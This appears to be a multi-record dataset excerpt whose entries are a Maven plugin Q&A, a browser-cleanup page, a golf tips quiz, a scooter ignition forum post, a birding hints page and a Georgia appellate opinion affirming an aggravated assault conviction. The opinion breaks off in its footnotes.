text stringlengths 3 7.38M | source_data stringclasses 5 values | info stringlengths 83 12.5k |
|---|---|---|
Q:
Maven-dependency-plugin copy package to a few places
I use maven-dependency-plugin to copy built package to remote server. I do this so:
<plugin>
<groupId>org.apache.maven.plugins</groupId>
<artifactId>maven-dependency-plugin</artifactId>
<version>2.8</version>
<executions>
<execution>
<id>copy</id>
<phase>package</phase>
<goals>
<goal>copy</goal>
</goals>
<configuration>
<artifactItems>
<artifactItem>
<groupId>${project.groupId}</groupId>
<artifactId>${project.artifactId}</artifactId>
<version>${project.version}</version>
<type>${project.packaging}</type>
<outputDirectory>/home/xxx/</outputDirectory>
</artifactItem>
</artifactItems>
</configuration>
</execution>
</executions>
</plugin>
Now I need to copy it to one more place (shared package for client and server - interfaces). How can I do it? I tried to add second outputDirectory,new block artifactItems and new block artifactItem but no result.
A:
You have to add another <execution> tag for this. This may share the same phase but has to have a unique id.
| mini_pile | {'original_id': '5a2806773368d5641df0cb3e31a9c8eaafaacedd4aa88e10356d43a34911fa9f'} |
Tidy up the content saved in your web browser
Every time you use your web browser, the software saves cookies and other information in the cache. To some degree, this is a helpful thing, as it enables you to retrace your footsteps and find sites that you have already visited. The downside, however, is that your internet history can eventually become full of so much information that it can become frustratingly difficult to find anything. And not to mention the potential security risk of a third party being able to retrace your footsteps.
For any PC, a content cleanup of the internet history is well warranted and worthwhile, although how often can depend on how much you use your computer and web browser. If removing the history and cookies from your web browser is not something you care to do manually, a viable alternative is to conduct the task with the help of an appropriate software porgram. A content cleanup program can assist you in removing your history and cookies entirely, leaving you with a clean slate with which to start over. | dclm_baseline | {'bff_contained_ngram_count_before_dedupe': '0', 'language_id_whole_page_fasttext': "{'en': 0.9359729886054992}", 'metadata': "{'Content-Length': '12822', 'Content-Type': 'application/http; msgtype=response', 'WARC-Block-Digest': 'sha1:EQF2YF3MTQDNNPRZKJUBT3DSPAR3YOYW', 'WARC-Concurrent-To': '<urn:uuid:a98721a6-10f3-4612-a7f0-8a76f8c16a15>', 'WARC-Date': datetime.datetime(2019, 5, 24, 8, 50, 20), 'WARC-IP-Address': '104.167.99.189', 'WARC-Identified-Payload-Type': 'application/xhtml+xml', 'WARC-Payload-Digest': 'sha1:OLO4NQ4PRWLAQ5ENIXYHR4TKMUBDHDC5', 'WARC-Record-ID': '<urn:uuid:bab67fa4-08f4-43df-bc75-686eb9d8f463>', 'WARC-Target-URI': 'http://aupcheck.com/i-want-to-clean-up-my-content-.html', 'WARC-Type': 'response', 'WARC-Warcinfo-ID': '<urn:uuid:400030b6-114a-4c43-ac75-e9c97e9b4e4f>', 'WARC-Truncated': None}", 'previous_word_count': '191', 'url': 'http://aupcheck.com/i-want-to-clean-up-my-content-.html', 'warcinfo': 'isPartOf: CC-MAIN-2019-22\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for May 2019\r\noperator: Common Crawl Admin (info@commoncrawl.org)\r\nhostname: ip-10-99-168-2.ec2.internal\r\nsoftware: Apache Nutch 1.15 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 1.1-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: http://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/', 'fasttext_openhermes_reddit_eli5_vs_rw_v2_bigram_200k_train_prob': '0.9805278778076172', 'original_id': 'cb5237c0fb9ecef9b88fdd52d06e71f58cfe5d1390be98c466d68839c3383f4d'} |
You're Correct!
Golf Question: What Is Ballooning Golf Ball Flight And How Should I Stop It?There is nothing less inviting than seeing the horrible marks on the top of your driver, or hitting that shot which shoots straight up into the air and finishes on the front edge of the fairway much to the support of your friends!
This shot is caused by the top edge of the driver hitting down and catching the bottom edge of the golf ball, it creates a severe amount of spin throwing the ball high into the air and sacrificing all hope of distance.
There are certain aspects of your set up to look for when this occurs on a regular basis.
1. Your tee height
The height of your tee seems like a really obvious one but with a good set up and golf swing it can be the only common denominator to make the top edge of the golf club hit the bottom of the golf ball. The height of the tee with a driver should allow the ball to sit with approximately half of the ball over the top of the driver at set up. This will encourage you to hit the ball on the up.
2. Width of stance
When setting up to a driver, the width of stance is vital for the weight transference during the swing. If the stance is too wide then weight can get stuck on the right side causing poor strikes into the ball. However, if the player then starts to reverse pivot, the angle of attack suddenly gets too steep causing the club to hit down too much on to the ball resulting in the sky shot. The sky shot can also be caused from the stance being too narrow and the players weight getting across to the left side too early, causing a steep angle of approach into the ball.
3. Ball position
Ball position is a key fundamental with every single club in a golf bag as it has an impact on a players strike. If the golf ball is too far back in the stance at set up then it causes the club to approach the ball too steeply. Alternatively, if the ball is positioned too far forward in the stance and the tee is high, the club will slide straight under the ball causing the sky shot.
Check all set up fundamentals for every club as well as the driver so the ball ballooning issues can be avoided for optimum ball striking.
Sorry Try Again! - See Explanation Below
Most golfers will see the ball go high up into the air and attribute it to the fact that they are not striking down on the golf ball enough. They will think that their club is coming up too much on the ball causing its high trajectory and short distance.
Be warned, hitting down on the ball will only compound ball ballooning issues.
Sorry Try Again! - See Explanation Below
Seeing the ball go extremely high can be attributed to the velocity of the swing creating too much back spin, however, a shot that is ballooning up into the air can be the result of a poor angle of approach. Whether you are skying the driver or hitting mid irons too high, the angle of approach into the ball will be too steep causing much more back spin than what is desired by the golfing gods. Shortening the swing will certainly produce less spin and height but also cause a loss in distance.
Sorry Try Again! - See Explanation Below
Golfers can only see what the ball is telling them, and if the ball tells them its going too high then all golfers will try to do whatever it takes to help it go lower. A player putting their hands forward at address can encourage an even steeper angle of approach into the ball causing it to go the same height or sometimes even higher. | dclm_baseline | {'bff_contained_ngram_count_before_dedupe': '0', 'language_id_whole_page_fasttext': "{'en': 0.9405574202537536}", 'metadata': "{'Content-Length': '84472', 'Content-Type': 'application/http; msgtype=response', 'WARC-Block-Digest': 'sha1:A3OLNOHCCN3C3NEP4NO4M5IKCSQ3SJ2E', 'WARC-Concurrent-To': '<urn:uuid:4599b2f2-c3c9-490b-9a08-2f511c8f6b54>', 'WARC-Date': datetime.datetime(2021, 1, 21, 5, 45, 58), 'WARC-IP-Address': '64.91.231.109', 'WARC-Identified-Payload-Type': 'application/xhtml+xml', 'WARC-Payload-Digest': 'sha1:KFQ33M2CX3XLKASOBDYQIKOSPI3275VH', 'WARC-Record-ID': '<urn:uuid:26892c89-8650-427a-bc86-05c5432cef8a>', 'WARC-Target-URI': 'https://golf-info-guide.com/golf-tips/golf-questions-answers/golf-question-what-is-ballooning-golf-ball-flight-and-how-should-i-stop-it/', 'WARC-Type': 'response', 'WARC-Warcinfo-ID': '<urn:uuid:0af8c03f-ea9b-498b-8ea1-e66c497c71e3>', 'WARC-Truncated': None}", 'previous_word_count': '661', 'url': 'https://golf-info-guide.com/golf-tips/golf-questions-answers/golf-question-what-is-ballooning-golf-ball-flight-and-how-should-i-stop-it/', 'warcinfo': 'isPartOf: CC-MAIN-2021-04\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for January 2021\r\noperator: Common Crawl Admin (info@commoncrawl.org)\r\nhostname: ip-10-67-67-206.ec2.internal\r\nsoftware: Apache Nutch 1.17 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 1.2-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: http://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/', 'fasttext_openhermes_reddit_eli5_vs_rw_v2_bigram_200k_train_prob': '0.3214184045791626', 'original_id': '0e79c94658d2bf2618b8cbd9259d8f8b11ad8c82039ce9dc78742427c4237a7a'} |
From:Harry McGill
Subject:RE: Electrical issue with 63 scat Date:Sun Jun 5 00:01:23 2016
Response to:21287
See if you have a voltage at the Ignition point terminals. Could be contact points
are glazed, not making good contact. Reminder: Spark is produced when contact
points OPEN , power to the coil cut, causing the coils magnetic field to collapse
and induce the high voltage to the spark plug.
Help!im trying to get my restored 63 scat started, and seem to have a
I don't seem to have spark at the spark plug. The motor was restored rebuilt a
couple years ago but I've never had it started.
I also put. A new wiring harness.
Now I notice when I'm kicking it, if I hold the horn button in while kicking, the horn
will go off in a pattern like the engine turning over. But, the bike doesn't seem to
have spark at the spark plug. Yet I've checked all connections
So now I don't understand why the horn wire seems hot, but bike doesn't have
spark or start.
Thanks in advance.. Gene
Sent from IP Address:
Reverse Telephone Lookup | dclm_baseline | {'bff_contained_ngram_count_before_dedupe': '0', 'language_id_whole_page_fasttext': "{'en': 0.9180041551589966}", 'metadata': "{'Content-Length': '2330', 'Content-Type': 'application/http; msgtype=response', 'WARC-Block-Digest': 'sha1:DUQYVCGPU3K3THNNE3OGE564OBTLPT4W', 'WARC-Concurrent-To': '<urn:uuid:a4675575-2fd7-4ee8-af80-6191412cb585>', 'WARC-Date': datetime.datetime(2018, 12, 10, 21, 59, 38), 'WARC-IP-Address': '66.39.156.122', 'WARC-Identified-Payload-Type': 'text/html', 'WARC-Payload-Digest': 'sha1:OMWYGJTMCFFESI4DTDLBGRHRYTTZLDRF', 'WARC-Record-ID': '<urn:uuid:e24cfcf4-c14d-4810-a1e7-f12877ed7c0b>', 'WARC-Target-URI': 'https://harleyhummerclub.org/humex/21290.html', 'WARC-Type': 'response', 'WARC-Warcinfo-ID': '<urn:uuid:85d321b6-1549-4618-9084-fbfb2fb3d98c>', 'WARC-Truncated': None}", 'previous_word_count': '192', 'url': 'https://harleyhummerclub.org/humex/21290.html', 'warcinfo': 'isPartOf: CC-MAIN-2018-51\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for December 2018\r\noperator: Common Crawl Admin (info@commoncrawl.org)\r\nhostname: ip-10-109-214-234.ec2.internal\r\nsoftware: Apache Nutch 1.15 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 0.11-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: http://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/', 'fasttext_openhermes_reddit_eli5_vs_rw_v2_bigram_200k_train_prob': '0.023653149604797363', 'original_id': 'de10d1d6aa6f3756aa2b2e7a4c905cca63ea0d8fb327a989ecdfe7df134fde08'} |
Hints & Tips
©If only someone had warned us about the new gate!
This section is meant to be all about handy tips to help improve your birding, either in a very practical way or by dint of useful knowledge. I have drawn from some questions asked on mailing lists with responses that try to resolve problems. As ever, I would be happy to pass on other such tips & wrinkles.
Foggy Spectacles
I wear spectacles when birding, folding down the rubber eyecups on my bins. On my recent Jamaica trip, I got very frustrated by the fact that my specs kept misting up every time I used my bins. Has anyone found a reliable remedy to prevent this happening?
Answer 1:
I have heard that if you clean your glasses with neat washing up liquid, and then wipe it off this alleviates the problem. However, can I also point out that I have *NOT* tried this myself, as I tend to get eye irritation from such things. If anyone is brave enough to try this, please let us know if this works!
Answer 2:
I know that our medical endoscopists use this kind of washing up liquid to prevent misting on their endoscopes. I`ll try on my specs. Another solution would be to warm up your glasses, with a lighter? Or matches..?
My optician`s reply was something like this, when asked about washing up liquid? CERTAINLY NOT! It will eventually take any of coatings off lenses, even damage the lenses themselves. The proprietary sprays are better, wipes better still, but they do not have a perfect remedy. Quote It is just something we have to live with So folks it would appear it is a problem without a perfect solution (no pun intended).
Answer 3:
When I process black & white films at home, during the final rinse I use a few drops of a rinse aid which is a detergent that is designed to break the surface tension of the water and prevent droplets adhering to the film and causing drying marks. It says on the bottle that it is good for cleaning glass too. Perhaps wiping the glasses using this stuff would prevent the misting? Nip down to your camera club and ask someone for a few drops or a buy a bottle from a camera shop for a couple of quid - you could also use it to clean your optics too I suppose.
Answer 4:
There are any number of anti-static lens cleaning sprays available from opticians etc. many of which claim to prevent misting when applied. The one we use is fairly effective in as much as the lenses de-mist a hell of a lot quicker than when not applied. Not really a complete preventative remedy but maybe something worth considering.
Definitive Answer:
Re the prevention of misting specs in hot climates: Advice is, don`t use washing up liquid, as it contains more salt, also Non-ionic surfactants (Grease - cutters); whereas Shampoo has less salt, milder Surfactants (Amine oxides) and no Nonionics. Other wetting agents, Rinse-aids etc contain similar things but tend to also contain solvent, which may damage lens coatings, or even lenses if they are plastic. My advice - try a bit of shampoo or some other cleaner that is suitable for skin contact, but don`t use too much. And NEVER clean your specs while dry, because you will inevitably get scratched lenses!
Telescope Eye
Does anyone out there share my view, that I am suffering from bird-watchers` [or perhaps, rather, SEA-watchers`] eye, caused by too much time squinting through the telescope? One tries to use the other eye, but you all know how difficult that is.
Eric Wydenbach
Yes. My right eye`s vision is definitely less clear than my left`s. I attribute this to nearly 30 year`s frequent use of a scope … I`ve suffered rather bad cases of telescope-eye and sea-watcher`s arse in the past.
Mike Alibone
Answer 1
Try wearing an eye-patch on the other eye. Less than £1 from Boots or any other chemists. Looks silly I know, but it does relieve a LOT of the strain, which is mainly caused by holding one eye shut and the other open for a long period. And so what if it looks silly, if it helps you find birds, that`s all that matters.
Michael Frankis
Answer 2
With a little effort and training, it is perfectly possible to keep the non-observing eye open which helps a lot. Exactly the same with using a monocular microscope. The other thing I do is to alternate eyes as much as possible. You may think that one eye is much better than the other, or physically easier to use, but a lot of this is just what you`ve got used to. Unless one eye is much worse optically than the other, after a little while you should find that both work through the telescope with equal facility.
Malcolm Ogilvie
Answer 3
As someone who sea-watches almost every day, I too would recommend an eye-patch (ie for the eye not looking through the scope). I also find less strain when using my scope with angled eyepiece although it may have more to do with the flap of the zipped open end of the protective casing which I find covers my left eye to an extent which means I don`t need to close it while scoping with my right eye…
Brian Unwin
Answer 4
I have a rectangular piece of closed cell foam - about 10 x 6 inches - with a hole for the telescope eyepiece. I can look through the telescope with either eye (it takes a bit of effort to use my left eye as I am a right-eyed person) and keep the other one open quite easily as there is only a dark blank for it to see - no distractions. This avoids the discomfort and silly comments that come with wearing an eyepatch. As I wear glasses all thetime (including when looking through telescope, camera or binoculars) it is also much more practical than an eyepatch.
Annie Poole
Answer 5
In the use of microscopes, I managed to keep both eyes open. However, with a scope, there appear to be too many distractions to the non-scope-eye, whereas with a microscope, the other eye easily switches off because all it usually has to look at is a desktop. If using a scope for longer periods, I tend to cover my non-scope-eye with a hand, so I can then keep the eye open, although the eye-patch method must be just as good, if not better.
Nigel Moorhouse
Disabled Birders – off-roading
I recommend a new device, which has recently been launched on the market in Britain having been showcased on Tomorrow`s World a few months ago. It is called the Powertrike, and basically it consists of a motorised front wheel, attached to motorbike-style handlebars which fits on under the seat of a manual wheelchair. It is designed for off-road use, and I have been using one to go birding for the last three months. It is a fantastic idea, and it makes accessible lots of places that would be almost impossible on your own, or certainly hard work with a friend to push. I have chased dragonflies in the swampy meadows of Strumpshaw, ploughed through tall grass at Wood Walton, taken it through the woods of Thetford Forest, and used it daily on rough tracks at Wicken Fen where I`ve been doing fieldwork this spring.
The motor is surprisingly powerful, and can drive you at 11mph on a good surface. The battery takes a few hours to charge up, and supposedly lasts 10-15 miles (but this depends on the terrain). The concept is brilliant, and the advantage is that it is light enough that you can throw it in the back of the car and take it out and attach it yourself.
There are various shortcomings which are worth bearing in mind:
1. It is still heavy. I have a complete T5 spinal injury, so I am paralysed from the chest down. I am reasonably strong armed though and can lift it in and out of the car and attach it myself, but other people may need help.
2. To avoid front-end wheel spins, the back wheels on your chair (which should be fat mountain-bike tyres for best effect off-road) should be set as far back as possible, shifting your centre of gravity forward. Not all wheelchairs have rear-wheel extension axles to allow this. Kuschall do but Quickie R2s don`t for example.
3. The fitting under the seat to which the powertrike attaches weighs a couple of pounds, and is semi-permanently fitted on fixed chairs (but can be easily removed each time on folding chairs).
Despite these issues, and a few teething problems with the first batches,this is a really clever idea, and is brilliant for the wheelchair birder. Call your wheelchair dealer to find out more.
Stu Butchart
Binoculars & Spectacles
Being of an age when I need a pair of spectacles for reading and writing - and now reaching the stage where I need another pair to look across the room/drive/look for birds, etc. I face a dilemma - one I am sure someone out there has faced in the past. I am, I am informed, a little to old and the eyes a little to dry for contacts - and would need a reading pair of specs. anyway. So how do I carry on my birding. Do I use bifocals/varifocals and push my specs up on my forehead? Do I look through my specs and my bins (loss of field of view). What do I lay out some £150+ on? I want the best of all worlds - probably no possible but your thoughts much appreciated.
R. E. (Bob) Scott
Answer 1
Sorry to hear that old age has caught up with you (at last!). The choice of whether specs are kept on the nose or pushed up when using bins was one we asked in the first-ever British Birds survey of binoculars and telescopes used by its readers, published in 1978. The division between spectacle wearers who bought bins with roll-back eyecups to allow close contact with the spectacles and who didn`t was just about 50:50, which suggests that it is a matter of personal preference.
My advice is the same as for people asking here about which bins or scope to buy. Go to a good stockist and try some different types out, with and without your specs. And perhaps bear in mind that while you may, now, be able to flick your specs up out of the way in a millisecond, as your reactions slow down with increasing age so this will take longer and longer thus allowing the bird you want to look at to get safely out of the way :-))
Malcolm Ogilvie
Answer 2
I have just bought my first pair of varifocals, and whilst I usually bird wearing contacts, these have to be the next best thing. In the past I`ve occasionally worn glasses whilst birding, it does take a little getting use to. But after a couple of years of having to lift my glasses on to my head, or looking over the top of them as I went about my daily business, I decided to try varifocals. They are very good. I was used to them in minutes and feel quite confident that I could go birding wearing them with little problem.
Paul Bromhead
Answer 3
1) I`ve been using my Leicas with my existing three pairs of specs for over three years and none are scratched through using my bins. A good pair of modern bins should NOT scratch your glasses - mine don`t and many bins I test (for bino surveys, work, etc) do not either. In fact, I`d be hard pressed to think of a mid-to-top end pair of bins introduced in the last 5 years that do. Yes some old models (of even some top notch manufacturers) have parts around the eyepieces that can scratch glasses, but the current crop of bins are all glasses friendly.
2) again, I`ve never had any problems with positioning and I have no loss of field of view with my bins, and you shouldn`t suffer any loss with the new generation of bins from most mid-to-top end manufacturers - just look at recently introduced pairs from Opticron, Minox, Eschenbach, Kahles, Bushnell, Bausch & Lomb, Swarovski, Leica, Zeiss - all perfectly usable with bins. Even the RSPB now do budget-mid price binos, which are great with specs!
My STRONG recommendation would always be to take your bins with you to the opticians and try them against each pair of glasses. Remember too that the flatter the glasses are (ie no wrap around shades, etc) the better the bins sit on the lenses. The prescription of the glasses will also play a part, as the larger the prescription, the more curved the lens. If you fall into this category, try the higher index lenses from Hoya, Zeiss or Nikon to give a flatter lens profile which are thinner, weigh less and have a flatter lens surface which suits bins better. Beware though, some high index lenses are prone to chromatic aberration which is exaggerated when looking through bins and scopes.
My other recommendation would be that if you think you are losing field of view whilst using your bins with your glasses – change your bins! I wouldn`t dream of removing my specs to use my bins - time wasted, fussy etc - so make sure you end up with the combination of specs and bins which best suit your needs.
Steve Dudley
Answer 4
Any good modern pair of bins can be used with specs. I never lift my specs, I loose sight of the bird. Good modern bins give the same field of view with specs on or off. I used to suffer from scratching on my specs but with the modern spec coatings and the use of solid eye caps instead of rubber that held pieces of dirt, that is a thing of the past, and I use plastic spec lenses. The best innovation in recent years in the advent of the flexon frames. I can bend the lenses through 180deg and almost wrap the arms round a finger. Now instead of the frames bending or pushing into your nose they take up a new shape as you press the bins to your specs and spring back into shape when released. They are a bit more expensive but worth the money.
John Miller
Supplimentary Question
As expected it seems each to his/her own regarding bins and glasses. I invariably lift mine because it definitely gives me a better field of view (but then I use my bins with the eye-cups folded back to get my eyes nearer the lens). I have my glasses on a cord so as not to drop them - yes they often get caught up in my bins strap but it seems a small price to pay to be sure where they are. I`ve rarely have problems getting onto birds between lifting glasses although it can be difficult when using a scope on flying birds as often I can`t see the spec I`m trying to focus on without my glasses. My biggest problem is when it rains - an umbrella would be fine with a third hand and even a cap with a good peak is not much use as not then able to lift the glasses, but then if it is raining much I can`t see through them anyway! Any bright ideas?
Richard Fairbank
Answer 5
The specs thing happened to me a few years ago when I had to move from reading, to reading and distance. I find bifocals O.K. but it takes practice. If you fold the rubber eyecups down you get almost the same field of view as with the naked eye.
I use my spare bifocal glasses for birding and general outdoor work as these have large lenses and the frame pushes against my brow when I have bins up against them. My everyday pair are the more fashionable small light type and these are O.K. too but need more practice to use. I see someone has mentioned varifocals, I have not tried these as I believe the optical compromise to be too great. For a very specific use at work where I need to be able to write, see far, and read instruments about 2 metres away I have invested in a pair of trifocals which work well for that use. Varifocals may be coming.
The bottom line is that for general birding you need to be able to put bins to glasses. You need to persevere at first. If it helps, I use Optolyth Alpin 10x40 and find no difference in field of view with or without specs. I have had no scratching problems, but my optician suggested I pay for an extra tough coating on the lenses which seems to work. Finally, you need to talk to a sensible optician of about your own age. Probably not a 25 year old in a shopping centre. Hope this helps.
John Lang Wilson
Answer 6
A few years ago I had a really small pair of glasses made:
1. Small so that they would be as close to my eyelashes to give widest field of view, but not touching as they get greasy quickly.
2. with glass not plastic so as not to scratch.
3. with out folding hinges to make them nearly indestructible.
4. gold frames so they would bend. Now small glasses are fashionable, you can get them with bendy frames which virtually will not destruct, plastic coated so hard it will not scratch and with verifocal so you can see the birds and make notes in your notebook. Cost UK <#300 USA < $300. Buy them on your next trip?
The only thing you must do is to tell your Optician to put your close focus centre as low in the glass as he can to give you maximum long vision for bins and scopes. You only need a little to scribble in the note book! If you`re really lucky you`ll look too sexy for the birds!
Brian Short
Other Links
Beginner’s Guide to Bird Watching
Birdwatching for Beginners
Bird watching is one of the easiest hobbies to take up. You don't need much equipment and you don't need to travel very far if you start off bird watching in your garden or local park. Bird watching can be done by yourself or in a group and you don't need to commit a lot of time to it if you don't want to.
How To Attract and Take Care of Backyard Birds
After doing some research there is no doubt what attracts and takes care of birds. FOOD, WATER, and SHELTER....
Making Your Own Nest Box
Making your own nest box is easy and rewarding! There are a variety of nest box designs suitable for a range of species. Two designs that are most commonly used in gardens are…
The Ultimate Beginners Guide to Bird Watching
Some basics from Jonny a Florida birder.
Ultimate Guide to Nest Boxes
Why You Should Have Them, and How to Build Your Own... | dclm_baseline | {'bff_contained_ngram_count_before_dedupe': '69', 'language_id_whole_page_fasttext': "{'en': 0.9593862891197203}", 'metadata': "{'Content-Length': '34169', 'Content-Type': 'application/http; msgtype=response', 'WARC-Block-Digest': 'sha1:BJU2GL6ZOV7WFRPTOGAQGUWGM6WKYOCR', 'WARC-Concurrent-To': '<urn:uuid:179c2426-a371-42f4-86ec-45b487a32964>', 'WARC-Date': datetime.datetime(2018, 10, 16, 23, 38, 9), 'WARC-IP-Address': '151.80.91.118', 'WARC-Identified-Payload-Type': 'text/html', 'WARC-Payload-Digest': 'sha1:MEO7VJBG24C44W3IMG4ZS3BPKT4T7UVP', 'WARC-Record-ID': '<urn:uuid:4d7bb0b9-91dc-4dca-ba68-d576ac7d4a38>', 'WARC-Target-URI': 'http://fatbirder.net/links/fun/hints_and_tips.html', 'WARC-Type': 'response', 'WARC-Warcinfo-ID': '<urn:uuid:423558c2-1094-4b31-a8fc-a9a1c2937c99>', 'WARC-Truncated': None}", 'previous_word_count': '3282', 'url': 'http://fatbirder.net/links/fun/hints_and_tips.html', 'warcinfo': 'isPartOf: CC-MAIN-2018-43\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for October 2018\r\noperator: Common Crawl Admin (info@commoncrawl.org)\r\nhostname: ip-10-30-126-152.ec2.internal\r\nsoftware: Apache Nutch 1.15 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 0.11-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: http://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/', 'fasttext_openhermes_reddit_eli5_vs_rw_v2_bigram_200k_train_prob': '0.024052977561950684', 'original_id': '8682e056ada7d27089c430f69391b606d44d9612448bdcdf3e735170fa8e9a82'} |
586 S.E.2d 352 (2003)
262 Ga. App. 643
DUNN
v.
The STATE.
No. A03A1050.
Court of Appeals of Georgia.
August 4, 2003.
*353 Adrian L. Patrick, Athens, for appellant.
Kenneth W. Mauldin, Dist. Atty., Edward H. Brumby, Jr., Asst. Dist. Atty., for appellee.
MIKELL, Judge.
An Athens-Clarke County jury found Morris Dunn guilty of two counts of aggravated assault[1] and one count of aggravated battery. In this appeal, Dunn maintains the trial court erred in (i) refusing to exclude his in-court identification by the victim, Aley Ealey, and (ii) refusing to grant a motion to suppress. He also argues insufficiency of the evidence. We affirm because these claims are without merit.
1. The evidence was sufficient to support Dunn's conviction. Viewed in a light most favorable to support the jury's verdict, the record shows that on May 20, 1997, Ealey was talking with friends outside his girlfriend's house. Ealey saw three men riding in a gray car with a vinyl top. The car drove down the street and turned around and came back. A man in the front seat of the car jumped out and shot Ealey in the neck. Ealey fell to the ground, paralyzed in his lower body. The man continued to fire after he ran past Ealey and then ran back to the car. The gunman and Ealey made eye contact before the gunman got into the car, which then sped off.
Antonio Lanier Thomas, who was at the scene, testified that he saw Morris Dunn in the front seat and Frederick Davenport in the back seat of a gray Buick; that he saw Davenport fire a weapon; and that "when I seen [Dunn] cocking the pistol, I heard a shot and that's when I ran." Thomas was connected to a 1996 police investigation of an incident in which Dunn had been shot. During that investigation, Dunn told an officer that "there's talk on the street that it was... Thomas" who shot him. Dunn also told the officer that if Dunn "knew that [Thomas] had shot him, that he'd be taking care of it himself."
Edward Pope Scott, Jr., a co-defendant, testified that he drove Dunn and Davenport to Dunn's sister's house in the Pauldoe area of Athens. According to Scott, when they saw that Dunn's sister was not home they headed back out of the area. Scott pulled over to let traffic through a narrow area between parked cars. He then heard shots. Scott testified that Dunn and Davenport fired shots from the car. Scott further testified that Dunn and Davenport threw their guns out of the vehicle before it was stopped by the police.
Todd Hunt, an Athens-Clarke County police officer, was dispatched in response to the shooting. Another unit arrived at the scene and broadcast a description of the vehicle *354 driven by the suspects and its direction of travel. Hunt was traveling westbound when he was passed by an eastbound vehicle with three occupants who matched the broadcast description. When Hunt turned around and activated his siren, the vehicle sped away from the officer, passing several vehicles left of the centerline. Hunt broadcast a call that he was chasing a vehicle which may have been involved in a drive-by shooting.
Officer Aubrey Epps heard Hunt's broadcast and blocked off an intersection to allow the chase to pass through. The suspect vehicle stopped before reaching the intersection, and Epps drove up beside it. Dunn, along with another occupant, tried to flee on foot, but were apprehended by Epps. Epps searched the scene and found a gun off the side of the road. He also saw spent shell casings in the rear of the vehicle, which evidence later showed to be fired from the discarded gun.
Hill Steed, an Athens-Clarke County police officer, visited Ealey about a week and a half after the shooting. Steed testified that Ealey, who was still in the hospital and on pain medication, identified Dunn from a photographic lineup as one of the persons in the vehicle but did not identify Dunn as the gunman who shot him.
Ealey traveled to Warm Springs for therapy for his paralysis and returned to Athens-Clarke County in October 1999. Later that fall, Ealey saw Dunn's picture in the newspaper, then called the police and gave them a statement that Dunn was the man who shot him. Ealey testified that his in-court identification of Dunn was based on his memory of what happened in 1997 and not based on seeing Dunn's picture in the newspaper in 1999.
Dunn argues that the only evidence that Dunn shot Ealey came from Ealey; none of the other witnesses actually saw Dunn shoot Ealey; and the prosecution was unable to tie any physical evidence from the shooting directly to Dunn. However, the evidence showed without question that the shooting occurred, that Dunn and Ealey were there, and that Dunn fired a weapon at the scene. The other witness accounts are not necessarily inconsistent with Ealey's testimony. Although Thomas testified that Davenport got out of the car to shoot, and he did not see Dunn get out to shoot, Thomas ran from the gunfire and did not witness the entire event. Ealey was unable to run. He identified Dunn as the person who shot him, and the manner of the identificationthat Dunn and Ealey had eye contact while Ealey lay paralyzed on the ground, is not impossible. "OCGA § 24-4-8 provides that `the testimony of a single witness is generally sufficient to establish a fact.' Here the victim's testimony alone is sufficient to authorize the jury's verdict of guilty beyond a reasonable doubt."[2]
We conclude that the evidence was sufficient for a rational trier of fact to find Dunn guilty of the crimes for which he was convicted.[3]
2. Dunn claims the trial court erred in denying his motion to exclude Ealey's in-court identification. The issue is whether the pre-trial identification of Dunn by Ealey impermissibly tainted the in-court identification.
With regard to the in-court identification, whether a subsequent in-court identification is tainted depends on all the circumstances of the case. Conviction based on eyewitness identification at trial following a pretrial identification by photograph will be set aside only if the photographic identification procedure was so impermissibly suggestive as to give rise to a very substantial likelihood of irreparable misidentification.[4]
Dunn does not show that the original photographic lineup was impermissibly suggestive. Dunn argues that because Ealey failed to identify him as the shooter in the *355 original photographic lineup, and because Ealey only identified Dunn as the gunman after seeing Dunn's picture in the paper, the suggestive pre-trial identification by Ealey impermissibly tainted the later in-court identification. This argument fails because Ealey was not shown the allegedly suggestive picture by law enforcement agents. Ealey saw the picture and contacted law enforcement officials on his own. Without government involvement, there was no violation of Dunn's due process rights and the issue becomes one of witness credibility.[5] A witness's pre-trial viewing of the defendant's picture in the newspaper does not make the in-court identification suppressible where the witness identifies the defendant based on personal observation, which is the case here.[6] Accordingly, the trial court did not err in denying Dunn's motion to exclude Ealey's in-court identification.
3. Dunn claims the trial court erred by denying his motion to suppress in connection with the police stop of the car in which Dunn was a passenger. The record does not reflect that a motion to suppress was made before trial. During Hunt's testimony, a co-defendant's counsel asked the trial court to suppress further testimony by Hunt on the grounds that he unlawfully initiated a traffic stop. It does not appear Dunn adopted the objection, and so the objection does not inure to his advantage on appeal.[7] Even if Dunn had made or adopted the objection, it had no merit. Insofar as the objection can be considered a motion to suppress tangible evidence, it was improper because it was not made in writing as required by OCGA § 17-5-30(b). It was also untimely.[8] Furthermore, Hunt had a reasonable suspicion that the occupants of the gray car had been involved in a shooting, and he was authorized to initiate an investigatory detention.[9] The trial court did not err in refusing to suppress Hunt's testimony or tangible evidence stemming from the stop.
Judgment affirmed.
JOHNSON, P. J., and ELDRIDGE, J., concur.
NOTES
[1] The two counts consisted of aggravated assault by assaulting Aley Ealey with intent to murder and aggravated assault by assaulting Ealey with a deadly weapon.
[2] (Citation and footnote omitted.) Armstead v. State, 255 Ga.App. 385, 386(1), 565 S.E.2d 579 (2002).
[3] Jackson v. Virginia, 443 U.S. 307, 99 S.Ct. 2781, 61 L.Ed.2d 560 (1979).
[4] (Citation and punctuation omitted.) Baugher v. State, 212 Ga.App. 7, 13-14(3), 440 S.E.2d 768 (1994).
